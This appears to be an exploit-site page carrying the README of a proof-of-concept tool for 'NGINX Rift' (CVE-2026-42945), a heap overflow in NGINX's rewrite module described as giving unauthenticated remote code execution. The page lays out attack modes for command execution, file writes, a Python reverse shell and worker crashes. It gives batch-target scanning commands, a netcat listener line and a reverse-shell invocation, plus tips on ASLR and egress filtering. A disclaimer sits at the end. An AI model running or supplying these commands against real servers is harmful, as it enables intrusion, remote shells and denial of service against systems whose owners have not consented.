Share
## https://sploitus.com/exploit?id=6E238313-C2F5-5929-BD80-D026E4B44DE4
# NGINX Rift RCE Exploit (CVE-2026-42945)

A professional Proof-of-Concept (PoC) tool for researching and identifying the NGINX Rift vulnerability, a critical heap-based buffer overflow in the ngx_http_rewrite_module.

## Vulnerability Overview

- CVE ID: CVE-2026-42945
- Alias: NGINX Rift
- Severity: Critical (CVSS 9.2)
- Affected Versions: NGINX 0.6.27 through 1.30.0
- Root Cause: Size-mismatch error in the two-pass rewrite engine when using unnamed PCRE captures ($1, $2) and replacement strings containing a ?.
- Impact: Unauthenticated Remote Code Execution (RCE) or Denial of Service (DoS).

## Features

- Multi-Mode Support: Test via single URL or a batch list from a .txt file.
- Multiple Exploit Methods:
  - id: Execute id command (Default).
  - sleep: Time-based verification (ideal for blind RCE).
  - write: Attempt to write a file to common web root directories.
  - shell: Send a Python-based reverse shell.
  - crash: Trigger a simple worker process crash (DoS).
- Color-Coded Interface: Clear visual indicators for vulnerable (Green), secure (Red), and debug (Yellow/Blue) states.
- Verbose Logging: Detailed socket-level interaction for researchers.

## Usage

### 1. Single Target Scan
```bash
python3 poc.py --url http://target.com --method id
```

### 2. Multi-Target Batch Scan
Create a file named targets.txt with one URL per line:
```text
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
```
Then run:
```bash
python3 poc.py --list targets.txt --method sleep
```

### 3. Custom Commands & Verbose Mode
```bash
python3 poc.py --url http://target.com --cmd "whoami" --verbose
```

### 4. Reverse Shell
Start your listener first: nc -lvp 1337
```bash
python3 poc.py --url http://target.com --method shell --listen-ip [YOUR_IP] --listen-port 1337
```

## Understanding Results

- [+] VULNERABLE (Green): The exploit triggered a memory corruption signature. If used with sleep, check if the response time matches the sleep duration.
- [-] Target not vulnerable (Red): The exploit could not trigger a crash using the provided memory candidates.
- [DEBUG] (Yellow/Blue): Background information on heap spraying and candidate addresses.

## Requirements & Limitations

- Python 3.x: No external libraries required (uses standard socket and argparse).
- ASLR: This PoC uses static memory addresses. On systems where ASLR is enabled, the exploit will likely result in a Denial of Service (DoS) rather than RCE unless a memory leak is provided.
- Hardening: Egress filtering (firewalls) may prevent curl or shell methods from sending data back to you. Use the sleep method for the most reliable confirmation.

## Disclaimer

This tool is for educational purposes and authorized security auditing only. The author is not responsible for any misuse or damage caused by this script. Always obtain explicit permission before testing against any infrastructure.